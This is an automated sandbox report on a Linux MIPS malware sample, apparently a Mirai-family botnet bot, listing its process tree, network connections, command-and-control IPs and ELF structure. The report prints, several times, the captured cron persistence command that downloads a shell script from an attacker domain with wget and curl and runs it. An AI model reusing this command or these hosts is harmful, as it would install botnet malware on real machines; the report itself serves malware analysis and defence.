Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
mpsl.elf

Overview

General Information

Sample name:mpsl.elf
Analysis ID:1541164
MD5:21256c2ed906767ea878798b626bbd96
SHA1:2eba4ba74f0ab72e1450b9d69e37416acfd6f987
SHA256:f7f8dd8891b1cfa2703a5b090a8c523a7b22bdd4c87c6793af86e30bc080e2a8
Tags:elfuser-abuse_ch
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false

Signatures

Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1541164
Start date and time:2024-10-24 14:27:05 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 6s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:mpsl.elf
Detection:MAL
Classification:mal48.troj.linELF@0/1@5/0
  • VT rate limit hit for: mpsl.elf
Command:/tmp/mpsl.elf
PID:6214
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:no crontab for root
  • system is lnxubuntu20
  • mpsl.elf (PID: 6214, Parent: 6131, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/mpsl.elf
    • mpsl.elf New Fork (PID: 6217, Parent: 6214)
    • sh (PID: 6217, Parent: 6214, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      • sh New Fork (PID: 6219, Parent: 6217)
        • sh New Fork (PID: 6221, Parent: 6219)
        • crontab (PID: 6221, Parent: 6219, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 6220, Parent: 6217)
      • crontab (PID: 6220, Parent: 6217, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
    • mpsl.elf New Fork (PID: 6222, Parent: 6214)
      • mpsl.elf New Fork (PID: 6273, Parent: 6222)
      • mpsl.elf New Fork (PID: 6275, Parent: 6222)
    • mpsl.elf New Fork (PID: 6224, Parent: 6214)
    • mpsl.elf New Fork (PID: 6234, Parent: 6214)
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results
Source: tmp.73SHgw.19.drString: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
Source: global trafficTCP traffic: 192.168.2.23:41616 -> 88.151.195.22:9692
Source: global trafficTCP traffic: 192.168.2.23:59006 -> 31.13.248.89:21150
Source: global trafficTCP traffic: 192.168.2.23:56726 -> 185.82.200.181:16227
Source: /tmp/mpsl.elf (PID: 6214)Socket: 127.0.0.1:1172Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownUDP traffic detected without corresponding DNS query: 65.21.1.106
Source: unknownUDP traffic detected without corresponding DNS query: 65.21.1.106
Source: unknownUDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknownUDP traffic detected without corresponding DNS query: 168.235.111.72
Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
Source: global trafficDNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: tmp.73SHgw.19.drString found in binary or memory: http://hailcocks.ru/wget.sh;
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal48.troj.linELF@0/1@5/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6221)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 6220)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /usr/bin/crontab (PID: 6220)File: /var/spool/cron/crontabs/tmp.73SHgwJump to behavior
Source: /usr/bin/crontab (PID: 6220)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/mpsl.elf (PID: 6273)File opened: /proc/6351/statusJump to behavior
Source: /tmp/mpsl.elf (PID: 6273)File opened: /proc/6362/statusJump to behavior
Source: /tmp/mpsl.elf (PID: 6273)File opened: /proc/6361/statusJump to behavior
Source: /tmp/mpsl.elf (PID: 6273)File opened: /proc/6353/statusJump to behavior
Source: /tmp/mpsl.elf (PID: 6273)File opened: /proc/6364/statusJump to behavior
Source: /tmp/mpsl.elf (PID: 6273)File opened: /proc/6352/statusJump to behavior
Source: /tmp/mpsl.elf (PID: 6273)File opened: /proc/6363/statusJump to behavior
Source: /tmp/mpsl.elf (PID: 6273)File opened: /proc/6355/statusJump to behavior
Source: /tmp/mpsl.elf (PID: 6273)File opened: /proc/6366/statusJump to behavior
Source: /tmp/mpsl.elf (PID: 6273)File opened: /proc/6354/statusJump to behavior
Source: /tmp/mpsl.elf (PID: 6273)File opened: /proc/6365/statusJump to behavior
Source: /tmp/mpsl.elf (PID: 6273)File opened: /proc/6357/statusJump to behavior
Source: /tmp/mpsl.elf (PID: 6273)File opened: /proc/6356/statusJump to behavior
Source: /tmp/mpsl.elf (PID: 6273)File opened: /proc/6367/statusJump to behavior
Source: /tmp/mpsl.elf (PID: 6273)File opened: /proc/6041/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 6273)File opened: /proc/6360/statusJump to behavior
Source: /tmp/mpsl.elf (PID: 6273)File opened: /proc/6359/statusJump to behavior
Source: /tmp/mpsl.elf (PID: 6273)File opened: /proc/6358/statusJump to behavior
Source: /tmp/mpsl.elf (PID: 6273)File opened: /proc/6317/statusJump to behavior
Source: /tmp/mpsl.elf (PID: 6217)Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"Jump to behavior
Source: submitted sampleStderr: no crontab for root: exit code = 0
Source: /tmp/mpsl.elf (PID: 6214)Queries kernel information via 'uname': Jump to behavior
Source: mpsl.elf, 6214.1.0000558c1b404000.0000558c1b4cd000.rw-.sdmp, mpsl.elf, 6222.1.0000558c1b404000.0000558c1b4cd000.rw-.sdmp, mpsl.elf, 6224.1.0000558c1b404000.0000558c1b4cd000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
Source: mpsl.elf, 6214.1.0000558c1b404000.0000558c1b4cd000.rw-.sdmp, mpsl.elf, 6222.1.0000558c1b404000.0000558c1b4cd000.rw-.sdmp, mpsl.elf, 6224.1.0000558c1b404000.0000558c1b4cd000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mipsel
Source: mpsl.elf, 6214.1.00007fffe96f6000.00007fffe9717000.rw-.sdmp, mpsl.elf, 6222.1.00007fffe96f6000.00007fffe9717000.rw-.sdmp, mpsl.elf, 6224.1.00007fffe96f6000.00007fffe9717000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/mpsl.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mpsl.elf
Source: mpsl.elf, 6214.1.00007fffe96f6000.00007fffe9717000.rw-.sdmp, mpsl.elf, 6222.1.00007fffe96f6000.00007fffe9717000.rw-.sdmp, mpsl.elf, 6224.1.00007fffe96f6000.00007fffe9717000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Scheduled Task/Job
Direct Volume Access1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1541164 Sample: mpsl.elf Startdate: 24/10/2024 Architecture: LINUX Score: 48 33 31.13.248.89, 21150, 59006 NETERRA-ASBG Bulgaria 2->33 35 109.202.202.202, 80 INIT7CH Switzerland 2->35 37 5 other IPs or domains 2->37 8 mpsl.elf 2->8         started        process3 process4 10 mpsl.elf sh 8->10         started        12 mpsl.elf 8->12         started        14 mpsl.elf 8->14         started        16 mpsl.elf 8->16         started        process5 18 sh crontab 10->18         started        22 sh 10->22         started        24 mpsl.elf 12->24         started        26 mpsl.elf 12->26         started        file6 31 /var/spool/cron/crontabs/tmp.73SHgw, ASCII 18->31 dropped 39 Sample tries to persist itself using cron 18->39 41 Executes the "crontab" command typically for achieving persistence 18->41 28 sh crontab 22->28         started        signatures7 process8 signatures9 43 Executes the "crontab" command typically for achieving persistence 28->43
SourceDetectionScannerLabelLink
mpsl.elf11%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
kingstonwikkerink.dyn
81.29.149.178
truefalse
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://hailcocks.ru/wget.sh;tmp.73SHgw.19.drfalse
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      185.82.200.181
      unknownNetherlands
      60117HSAEfalse
      88.151.195.22
      unknownAzerbaijan
      15723AZERONLINEAZfalse
      109.202.202.202
      unknownSwitzerland
      13030INIT7CHfalse
      31.13.248.89
      unknownBulgaria
      34224NETERRA-ASBGfalse
      91.189.91.43
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      185.82.200.181arm4.elfGet hashmaliciousUnknownBrowse
        na.elfGet hashmaliciousUnknownBrowse
          88.151.195.22mips.elfGet hashmaliciousUnknownBrowse
            arm5.elfGet hashmaliciousUnknownBrowse
              109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
              • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
              31.13.248.89mips.elfGet hashmaliciousUnknownBrowse
                arm4.elfGet hashmaliciousUnknownBrowse
                  91.189.91.43ppc.elfGet hashmaliciousUnknownBrowse
                    mozi.m.elfGet hashmaliciousUnknownBrowse
                      tftp.elfGet hashmaliciousUnknownBrowse
                        .i.elfGet hashmaliciousUnknownBrowse
                          i486.elfGet hashmaliciousUnknownBrowse
                            boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                              nsharm6.elfGet hashmaliciousMiraiBrowse
                                boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                  BoM00gWx1d.elfGet hashmaliciousUnknownBrowse
                                    hidakibest.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                      91.189.91.42ppc.elfGet hashmaliciousUnknownBrowse
                                        mozi.m.elfGet hashmaliciousUnknownBrowse
                                          tftp.elfGet hashmaliciousUnknownBrowse
                                            .i.elfGet hashmaliciousUnknownBrowse
                                              i486.elfGet hashmaliciousUnknownBrowse
                                                boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                                  nsharm6.elfGet hashmaliciousMiraiBrowse
                                                    boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                      BoM00gWx1d.elfGet hashmaliciousUnknownBrowse
                                                        hidakibest.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          kingstonwikkerink.dynppc.elfGet hashmaliciousUnknownBrowse
                                                          • 88.151.195.22
                                                          mips.elfGet hashmaliciousUnknownBrowse
                                                          • 88.151.195.22
                                                          arm5.elfGet hashmaliciousUnknownBrowse
                                                          • 88.151.195.22
                                                          arm4.elfGet hashmaliciousUnknownBrowse
                                                          • 88.151.195.22
                                                          x86.elfGet hashmaliciousUnknownBrowse
                                                          • 185.82.200.181
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                          • 27.102.115.180
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                          • 158.51.124.230
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                          • 45.144.172.147
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                          • 45.144.172.147
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                          • 87.120.166.4
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CANONICAL-ASGBppc.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          mozi.m.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          tftp.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          .i.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          i686.elfGet hashmaliciousUnknownBrowse
                                                          • 185.125.190.26
                                                          x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 185.125.190.26
                                                          i486.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          na.elfGet hashmaliciousUnknownBrowse
                                                          • 185.125.190.26
                                                          nsharm6.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          NETERRA-ASBGjade.x86.elfGet hashmaliciousMiraiBrowse
                                                          • 212.73.131.247
                                                          mips.elfGet hashmaliciousUnknownBrowse
                                                          • 31.13.248.89
                                                          arm4.elfGet hashmaliciousUnknownBrowse
                                                          • 31.13.248.89
                                                          https://beforeitsnews.com/health/2024/10/the-happier-meditation-app-is-offering-free-1-year-access-99-value-3059722.htmlGet hashmaliciousUnknownBrowse
                                                          • 93.123.102.190
                                                          https://beforeitsnews.com/health/2024/10/the-happier-meditation-app-is-offering-free-1-year-access-99-value-3059722.htmlGet hashmaliciousUnknownBrowse
                                                          • 93.123.102.185
                                                          https://shorturl.at/5LwA8Get hashmaliciousUnknownBrowse
                                                          • 93.123.102.147
                                                          http://walletsupportdesk.com/Get hashmaliciousUnknownBrowse
                                                          • 93.123.102.226
                                                          http://www.web3walletsync.com/Get hashmaliciousUnknownBrowse
                                                          • 93.123.102.192
                                                          http://quantmarketfunds.orgGet hashmaliciousUnknownBrowse
                                                          • 93.123.102.198
                                                          http://umjkitjtsk.top/crp/325gewfkj345Get hashmaliciousUnknownBrowse
                                                          • 93.123.102.210
                                                          INIT7CHppc.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          mozi.m.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          tftp.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          .i.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          i486.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          nsharm6.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          BoM00gWx1d.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          hidakibest.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 109.202.202.202
                                                          HSAEarm4.elfGet hashmaliciousUnknownBrowse
                                                          • 185.82.200.181
                                                          Copia r#U00e1pida del pago INV 00932024.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 194.36.191.196
                                                          SecuriteInfo.com.Heur.27949.8326.docxGet hashmaliciousUnknownBrowse
                                                          • 185.82.202.150
                                                          Proforma Invoice NOCAP PLASTIK AMBALA.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 194.36.191.196
                                                          ynwj.ps1Get hashmaliciousUnknownBrowse
                                                          • 194.36.191.196
                                                          na.elfGet hashmaliciousUnknownBrowse
                                                          • 185.82.200.181
                                                          RFQ SN00954666 for prosjekt CMC 40 fot container.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 194.36.191.196
                                                          i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 185.82.202.195
                                                          i686.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 185.82.202.195
                                                          m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 185.82.202.195
                                                          AZERONLINEAZmips.elfGet hashmaliciousUnknownBrowse
                                                          • 88.151.195.22
                                                          arm5.elfGet hashmaliciousUnknownBrowse
                                                          • 88.151.195.22
                                                          na.elfGet hashmaliciousUnknownBrowse
                                                          • 46.23.108.110
                                                          https://94837-coinbase.com/Get hashmaliciousUnknownBrowse
                                                          • 164.215.103.68
                                                          http://bk.ruGet hashmaliciousHTMLPhisherBrowse
                                                          • 62.217.160.2
                                                          d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                                                          • 46.23.108.235
                                                          d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                                                          • 46.23.108.235
                                                          SecuriteInfo.com.ELF.Mirai-AMB.17604.8971.elfGet hashmaliciousUnknownBrowse
                                                          • 46.23.108.45
                                                          bb67L2Nte2.elfGet hashmaliciousUnknownBrowse
                                                          • 46.23.108.45
                                                          No context
                                                          No context
                                                          Process:/usr/bin/crontab
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):306
                                                          Entropy (8bit):5.137301653713653
                                                          Encrypted:false
                                                          SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQLYoUZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsV:8QjHig8UxeHLUHYC+GABjnOGAFkz
                                                          MD5:CBA33860CB3ACA059152C9D7F9714A1B
                                                          SHA1:164071E0891748C549A8E61BE6328DA01038448A
                                                          SHA-256:4602BEAD538D70683E31D8159FF345204915FE7F1E7D760E98D2B23D4AF25A2A
                                                          SHA-512:F22FC1B1DD76F005A16F43D0E7523679873D24FC35B4A7D0BFA79F67E07053851F485EFE614B7F74CA104FD5F460BCF90DBA0F6D2BA34AB1886283C35FFAABAC
                                                          Malicious:true
                                                          Reputation:low
                                                          Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Thu Oct 24 07:27:47 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
                                                          File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                                          Entropy (8bit):5.5353733629908515
                                                          TrID:
                                                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                          File name:mpsl.elf
                                                          File size:102'572 bytes
                                                          MD5:21256c2ed906767ea878798b626bbd96
                                                          SHA1:2eba4ba74f0ab72e1450b9d69e37416acfd6f987
                                                          SHA256:f7f8dd8891b1cfa2703a5b090a8c523a7b22bdd4c87c6793af86e30bc080e2a8
                                                          SHA512:fa4c27d5ea500ba15f404593f5ee9fb3e07d71f5b9cb13722fc99eaee5be8e1d87b5ee5075d57bb4959406257b180864228db9b3443eebe9b38d53375b10de03
                                                          SSDEEP:1536:UHvYMs2ziv1BV7uhsl1zWncjmT9ZtZVm2ZEaoaBEuLC2ZcB7:UHvY100hZjmZZtmj7B7
                                                          TLSH:51A3D61AAF610EFBD86FCD3706B9070535CC551B22A87B3A3574D928F60B54B0AE3D68
                                                          File Content Preview:.ELF....................`.@.4...|.......4. ...(...............@...@...........................E...E.$....[..........Q.td...............................<L..'!......'.......................<(..'!... .........9'.. ........................<...'!...$........g9

                                                          ELF header

                                                          Class:ELF32
                                                          Data:2's complement, little endian
                                                          Version:1 (current)
                                                          Machine:MIPS R3000
                                                          Version Number:0x1
                                                          Type:EXEC (Executable file)
                                                          OS/ABI:UNIX - System V
                                                          ABI Version:0
                                                          Entry Point Address:0x400260
                                                          Flags:0x1007
                                                          ELF Header Size:52
                                                          Program Header Offset:52
                                                          Program Header Size:32
                                                          Number of Program Headers:3
                                                          Section Header Offset:102012
                                                          Section Header Size:40
                                                          Number of Section Headers:14
                                                          Header String Table Index:13
                                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                          NULL0x00x00x00x00x0000
                                                          .initPROGBITS0x4000940x940x8c0x00x6AX004
                                                          .textPROGBITS0x4001200x1200x166e00x00x6AX0016
                                                          .finiPROGBITS0x4168000x168000x5c0x00x6AX004
                                                          .rodataPROGBITS0x4168600x168600x1b900x00x2A0016
                                                          .ctorsPROGBITS0x4583f40x183f40x80x00x3WA004
                                                          .dtorsPROGBITS0x4583fc0x183fc0x80x00x3WA004
                                                          .data.rel.roPROGBITS0x4584080x184080x100x00x3WA004
                                                          .dataPROGBITS0x4584200x184200x3c80x00x3WA0016
                                                          .gotPROGBITS0x4587f00x187f00x6280x40x10000003WAp0016
                                                          .sbssNOBITS0x458e180x18e180x2c0x00x10000003WAp004
                                                          .bssNOBITS0x458e500x18e180x51480x00x3WA0016
                                                          .mdebug.abi32PROGBITS0xcde0x18e180x00x00x0001
                                                          .shstrtabSTRTAB0x00x18e180x640x00x0001
                                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                          LOAD0x00x4000000x4000000x183f00x183f05.56070x5R E0x10000.init .text .fini .rodata
                                                          LOAD0x183f40x4583f40x4583f40xa240x5ba43.91180x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                                                          GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 24, 2024 14:27:48.600280046 CEST416169692192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:27:48.605719090 CEST96924161688.151.195.22192.168.2.23
                                                          Oct 24, 2024 14:27:48.605772018 CEST416169692192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:27:48.614463091 CEST416169692192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:27:48.619769096 CEST96924161688.151.195.22192.168.2.23
                                                          Oct 24, 2024 14:27:48.619817972 CEST416169692192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:27:48.625138044 CEST96924161688.151.195.22192.168.2.23
                                                          Oct 24, 2024 14:27:48.856209993 CEST416189692192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:27:48.861879110 CEST96924161888.151.195.22192.168.2.23
                                                          Oct 24, 2024 14:27:48.861990929 CEST416189692192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:27:48.886318922 CEST416189692192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:27:48.891954899 CEST96924161888.151.195.22192.168.2.23
                                                          Oct 24, 2024 14:27:48.892010927 CEST416189692192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:27:48.897778988 CEST96924161888.151.195.22192.168.2.23
                                                          Oct 24, 2024 14:27:49.826189041 CEST96924161888.151.195.22192.168.2.23
                                                          Oct 24, 2024 14:27:49.826591015 CEST416189692192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:27:49.826591015 CEST416189692192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:27:52.032373905 CEST42836443192.168.2.2391.189.91.43
                                                          Oct 24, 2024 14:27:52.800398111 CEST4251680192.168.2.23109.202.202.202
                                                          Oct 24, 2024 14:27:54.840958118 CEST5571214739192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:27:54.846426010 CEST147395571288.151.195.22192.168.2.23
                                                          Oct 24, 2024 14:27:54.846509933 CEST5571214739192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:27:54.846509933 CEST5571214739192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:27:54.851900101 CEST147395571288.151.195.22192.168.2.23
                                                          Oct 24, 2024 14:27:54.852008104 CEST5571214739192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:27:54.857418060 CEST147395571288.151.195.22192.168.2.23
                                                          Oct 24, 2024 14:27:55.810477018 CEST147395571288.151.195.22192.168.2.23
                                                          Oct 24, 2024 14:27:55.810619116 CEST5571214739192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:27:55.810620070 CEST5571214739192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:27:58.617151976 CEST416169692192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:27:58.622805119 CEST96924161688.151.195.22192.168.2.23
                                                          Oct 24, 2024 14:27:58.928771019 CEST96924161688.151.195.22192.168.2.23
                                                          Oct 24, 2024 14:27:58.928858995 CEST416169692192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:28:00.900357008 CEST5900621150192.168.2.2331.13.248.89
                                                          Oct 24, 2024 14:28:00.905946016 CEST211505900631.13.248.89192.168.2.23
                                                          Oct 24, 2024 14:28:00.906021118 CEST5900621150192.168.2.2331.13.248.89
                                                          Oct 24, 2024 14:28:00.906021118 CEST5900621150192.168.2.2331.13.248.89
                                                          Oct 24, 2024 14:28:00.911402941 CEST211505900631.13.248.89192.168.2.23
                                                          Oct 24, 2024 14:28:00.911461115 CEST5900621150192.168.2.2331.13.248.89
                                                          Oct 24, 2024 14:28:00.916886091 CEST211505900631.13.248.89192.168.2.23
                                                          Oct 24, 2024 14:28:01.530522108 CEST211505900631.13.248.89192.168.2.23
                                                          Oct 24, 2024 14:28:01.530663967 CEST5900621150192.168.2.2331.13.248.89
                                                          Oct 24, 2024 14:28:01.537900925 CEST211505900631.13.248.89192.168.2.23
                                                          Oct 24, 2024 14:28:06.543131113 CEST5672616227192.168.2.23185.82.200.181
                                                          Oct 24, 2024 14:28:06.549498081 CEST1622756726185.82.200.181192.168.2.23
                                                          Oct 24, 2024 14:28:06.549586058 CEST5672616227192.168.2.23185.82.200.181
                                                          Oct 24, 2024 14:28:06.549587011 CEST5672616227192.168.2.23185.82.200.181
                                                          Oct 24, 2024 14:28:06.555202961 CEST1622756726185.82.200.181192.168.2.23
                                                          Oct 24, 2024 14:28:06.555262089 CEST5672616227192.168.2.23185.82.200.181
                                                          Oct 24, 2024 14:28:06.560581923 CEST1622756726185.82.200.181192.168.2.23
                                                          Oct 24, 2024 14:28:07.134443045 CEST43928443192.168.2.2391.189.91.42
                                                          Oct 24, 2024 14:28:16.557209969 CEST5672616227192.168.2.23185.82.200.181
                                                          Oct 24, 2024 14:28:16.562860012 CEST1622756726185.82.200.181192.168.2.23
                                                          Oct 24, 2024 14:28:16.803698063 CEST1622756726185.82.200.181192.168.2.23
                                                          Oct 24, 2024 14:28:16.803762913 CEST5672616227192.168.2.23185.82.200.181
                                                          Oct 24, 2024 14:28:19.424671888 CEST42836443192.168.2.2391.189.91.43
                                                          Oct 24, 2024 14:28:23.516096115 CEST4251680192.168.2.23109.202.202.202
                                                          Oct 24, 2024 14:28:48.088876963 CEST43928443192.168.2.2391.189.91.42
                                                          Oct 24, 2024 14:29:18.978869915 CEST416169692192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:29:19.188601971 CEST416169692192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:29:19.291270971 CEST96924161688.151.195.22192.168.2.23
